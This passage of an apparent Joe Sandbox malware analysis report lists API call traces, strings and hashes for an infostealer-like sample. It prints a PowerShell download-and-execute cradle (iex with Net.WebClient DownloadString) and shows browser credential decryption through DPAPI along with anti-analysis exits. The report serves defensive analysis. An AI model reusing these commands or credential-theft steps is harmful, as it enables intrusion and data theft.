                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID: *n@$*n@
                                                            • API String ID: 1029625771-193229609
                                                            • Opcode ID: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                                            • Instruction ID: a280f62563b1b8af23ece619f3fba2aedbd92eaccb2561d1aa32790852693925
                                                            • Opcode Fuzzy Hash: bf609db6eed200fea4b15f7f51f4bbb31f3205db81936f2c349fbd39333cdc99
                                                            • Instruction Fuzzy Hash: DA71C874A00119DFCB04CF48C484BEAB7B2FB88315F158179E80AAF391D739AA91CB95
                                                            APIs
                                                            • lstrcat.KERNEL32(?,0064A30C), ref: 022E4A42
                                                              • Part of subcall function 022E9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022E9072
                                                            • lstrcat.KERNEL32(?,00000000), ref: 022E4A68
                                                            • lstrcat.KERNEL32(?,?), ref: 022E4A87
                                                            • lstrcat.KERNEL32(?,?), ref: 022E4A9B
                                                            • lstrcat.KERNEL32(?,0064A284), ref: 022E4AAE
                                                            • lstrcat.KERNEL32(?,?), ref: 022E4AC2
                                                            • lstrcat.KERNEL32(?,0064A2C8), ref: 022E4AD6
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                              • Part of subcall function 022E8FF7: GetFileAttributesA.KERNEL32(00000000,?,022D1DBB,?,?,0042565C,?,?,00420E1F), ref: 022E9006
                                                              • Part of subcall function 022E47D7: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 022E47E7
                                                              • Part of subcall function 022E47D7: RtlAllocateHeap.NTDLL(00000000), ref: 022E47EE
                                                              • Part of subcall function 022E47D7: wsprintfA.USER32 ref: 022E480D
                                                              • Part of subcall function 022E47D7: FindFirstFileA.KERNEL32(?,?), ref: 022E4824
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                            • String ID:
                                                            • API String ID: 2540262943-0
                                                            • Opcode ID: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                                            • Instruction ID: f2d4d514add2d969cebb377d1db9d96e4ed18de71ae1ecd4539420b9d826a375
                                                            • Opcode Fuzzy Hash: 78345fe715bd3a89254a4c2b5c0583ef77495b8e9b9ae479ef4891d8c2e90729
                                                            • Instruction Fuzzy Hash: CB3192B69503086BDF10FBF0CC84EED737AAB58700F8045C9B24696094EEB49789DF95
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                                                            Strings
                                                            • <, xrefs: 00412D39
                                                            • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                                                            • ')", xrefs: 00412CB3
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            • API String ID: 3031569214-898575020
                                                            • Opcode ID: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                                            • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                                                            • Opcode Fuzzy Hash: be724a604eb788cc69cb88ea5721ac6dea3b77e10dbfd579f56e69c65ca0a354
                                                            • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9
                                                            APIs
                                                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 022D14A5
                                                            • __aulldiv.LIBCMT ref: 022D14BF
                                                            • __aulldiv.LIBCMT ref: 022D14CD
                                                            • ExitProcess.KERNEL32 ref: 022D14FB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                            • String ID: @
                                                            • API String ID: 3404098578-2766056989
                                                            • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                            • Instruction ID: 06d6101d926c31066536a6e1e8b75f2bc983d3fcd1a147eb1f670d67b98c375a
                                                            • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                            • Instruction Fuzzy Hash: 0E011DB0961308BAEF10DBD0CC89B9DBB7DAB00B05F609448E70A776C8D7B4A5958B55
                                                            APIs
                                                            • memcmp.MSVCRT(?,00421264,00000003), ref: 022DA094
                                                              • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                                              • Part of subcall function 022E0CC7: memset.MSVCRT ref: 022E0E83
                                                              • Part of subcall function 022E0CC7: lstrcat.KERNEL32(?,00000000), ref: 022E0E9C
                                                              • Part of subcall function 022E0CC7: lstrcat.KERNEL32(?,00420D7C), ref: 022E0EAE
                                                              • Part of subcall function 022E0CC7: lstrcat.KERNEL32(?,00000000), ref: 022E0EC4
                                                              • Part of subcall function 022E0CC7: lstrcat.KERNEL32(?,00420D80), ref: 022E0ED6
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                            • memcmp.MSVCRT(?,00421114,00000003), ref: 022DA116
                                                            • memset.MSVCRT ref: 022DA14F
                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 022DA1A8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                                            • String ID: @
                                                            • API String ID: 1977917189-2766056989
                                                            • Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                                            • Instruction ID: 1033d2c68e6845531657e77deb6a04fad2dd76ddb81437c13d48f650b9555aab
                                                            • Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                                            • Instruction Fuzzy Hash: 05615C30A203489BDF24EFE4CD95FED7776AF54304F408118E90A5B698DBB46A05CF51
                                                            APIs
                                                            • strtok_s.MSVCRT ref: 00410DB8
                                                            • strtok_s.MSVCRT ref: 00410EFD
                                                              • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00876340,?,0042110C,?,00000000), ref: 0041A82B
                                                              • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: strtok_s$lstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 348468850-0
                                                            • Opcode ID: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                                            • Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
                                                            • Opcode Fuzzy Hash: 157972442aab98f8943623bffcefb76fc7b802db09b007e8cca3bf4835712916
                                                            • Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                              • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                              • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                              • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                              • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                              • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                              • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                              • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                                              • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                              • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                              • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                              • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                            • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                                              • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                                              • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                                              • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                                              • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                                            • String ID: $"encrypted_key":"$DPAPI
                                                            • API String ID: 3731072634-738592651
                                                            • Opcode ID: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                                            • Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
                                                            • Opcode Fuzzy Hash: 68f47abcc5eb6623e645a076bb0a9bdec2c93405b0c0c50e63f4af5dcb573e5c
                                                            • Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CodeInfoPageValidmemset
                                                            • String ID:
                                                            • API String ID: 703783727-0
                                                            • Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                                            • Instruction ID: b1b66c0af393fb712239824e55ca1d3d67ab2e75243c17e9d4cbdf9bdafd0db6
                                                            • Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                                            • Instruction Fuzzy Hash: ED312B30A242929EDF259FF8C8542797FA09B06314B8841BBD883CF19AC778C405E762
                                                            APIs
                                                            • GetSystemTime.KERNEL32(?), ref: 022E6BD3
                                                            • sscanf.NTDLL ref: 022E6C00
                                                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 022E6C19
                                                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 022E6C27
                                                            • ExitProcess.KERNEL32 ref: 022E6C41
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Time$System$File$ExitProcesssscanf
                                                            • String ID:
                                                            • API String ID: 2533653975-0
                                                            • Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                                            • Instruction ID: eb3b71ad43b573599eead478bf84f8e489c540ff3c251f41f64a1c6ec8ece494
                                                            • Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                                                            • Instruction Fuzzy Hash: F221EBB5D14209AFCF08EFE4D9499EEB7BAFF48300F44952EE406A3254EB345604CB65
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                                                            • HeapAlloc.KERNEL32(00000000), ref: 00417E3E
                                                            • RegOpenKeyExA.ADVAPI32(80000002,00872B00,00000000,00020119,?), ref: 00417E5E
                                                            • RegQueryValueExA.ADVAPI32(?,00879BD8,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                                                            • RegCloseKey.ADVAPI32(?), ref: 00417E92
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                            • String ID:
                                                            • API String ID: 3466090806-0
                                                            • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                            • Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
                                                            • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                            • Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022E809E
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 022E80A5
                                                            • RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 022E80C5
                                                            • RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 022E80E6
                                                            • RegCloseKey.ADVAPI32(?), ref: 022E80F9
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                            • String ID:
                                                            • API String ID: 3225020163-0
                                                            • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                            • Instruction ID: 1cfbfafacebd8db028af679e1c0ef27b95508f54e4dc37e628e7a89a8b328d39
                                                            • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                                            • Instruction Fuzzy Hash: 6C113DB5A94209BBDB10CFD4DD4AFBBB7B9EB05710F104219F616A7290C7B558008BA2
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022E799B
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 022E79A2
                                                            • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,022E7920), ref: 022E79C2
                                                            • RegQueryValueExA.ADVAPI32(022E7920,00420AAC,00000000,00000000,?,000000FF), ref: 022E79E1
                                                            • RegCloseKey.ADVAPI32(022E7920), ref: 022E79EB
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                            • String ID:
                                                            • API String ID: 3225020163-0
                                                            • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                            • Instruction ID: 56d574a23b1c796c7e6fce387c749d245cc72171ec3e13636da9deb623f7c15c
                                                            • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                            • Instruction Fuzzy Hash: 850144B9A40308BFEB10DFE0DC49FAEB7B9EB48701F104159FA05A7280D67455008F51
                                                            APIs
                                                            • StrStrA.SHLWAPI(00879198,?,?,?,0041140C,?,00879198,00000000), ref: 0041926C
                                                            • lstrcpyn.KERNEL32(0064AB88,00879198,00879198,?,0041140C,?,00879198), ref: 00419290
                                                            • lstrlenA.KERNEL32(?,?,0041140C,?,00879198), ref: 004192A7
                                                            • wsprintfA.USER32 ref: 004192C7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpynlstrlenwsprintf
                                                            • String ID: %s%s
                                                            • API String ID: 1206339513-3252725368
                                                            • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                            • Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
                                                            • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                            • Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                            • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                            • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                            • String ID:
                                                            • API String ID: 3466090806-0
                                                            • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                            • Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
                                                            • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                            • Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022D151B
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 022D1522
                                                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 022D153E
                                                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 022D155C
                                                            • RegCloseKey.ADVAPI32(?), ref: 022D1566
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                            • String ID:
                                                            • API String ID: 3225020163-0
                                                            • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                            • Instruction ID: 63084d8a319a27892082af4f4125e024ba0b0ff5d856c36659a97c20f700532c
                                                            • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                                            • Instruction Fuzzy Hash: A50131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA0597280D6749A018F91
                                                            APIs
                                                            • __getptd.LIBCMT ref: 0041C74E
                                                              • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                                              • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                                            • __getptd.LIBCMT ref: 0041C765
                                                            • __amsg_exit.LIBCMT ref: 0041C773
                                                            • __lock.LIBCMT ref: 0041C783
                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                            • String ID:
                                                            • API String ID: 938513278-0
                                                            • Opcode ID: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                                            • Instruction ID: 4c6ecd523783b942696bdc62fd612c852c6eee159b5b032e672b771ca3e86784
                                                            • Opcode Fuzzy Hash: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                                            • Instruction Fuzzy Hash: B0F09632A813119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D28E9E
                                                            APIs
                                                            • __getptd.LIBCMT ref: 022EC9B5
                                                              • Part of subcall function 022EC206: __getptd_noexit.LIBCMT ref: 022EC209
                                                              • Part of subcall function 022EC206: __amsg_exit.LIBCMT ref: 022EC216
                                                            • __getptd.LIBCMT ref: 022EC9CC
                                                            • __amsg_exit.LIBCMT ref: 022EC9DA
                                                            • __lock.LIBCMT ref: 022EC9EA
                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 022EC9FE
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                            • String ID:
                                                            • API String ID: 938513278-0
                                                            • Opcode ID: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                                            • Instruction ID: c7d4657104b6a573818c3436915559dddaa834fa843ce52a85352d05b71a7e59
                                                            • Opcode Fuzzy Hash: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                                            • Instruction Fuzzy Hash: 20F096329603119FDF30BBE8550276D3391AF14728FD0410BD417A71D8DBA45540FF5A
                                                            APIs
                                                            • StrCmpCA.SHLWAPI(00000000,00876070), ref: 0041079A
                                                            • StrCmpCA.SHLWAPI(00000000,00876170), ref: 00410866
                                                            • StrCmpCA.SHLWAPI(00000000,00876120), ref: 0041099D
                                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                            Strings
                                                            Memory Dump Source
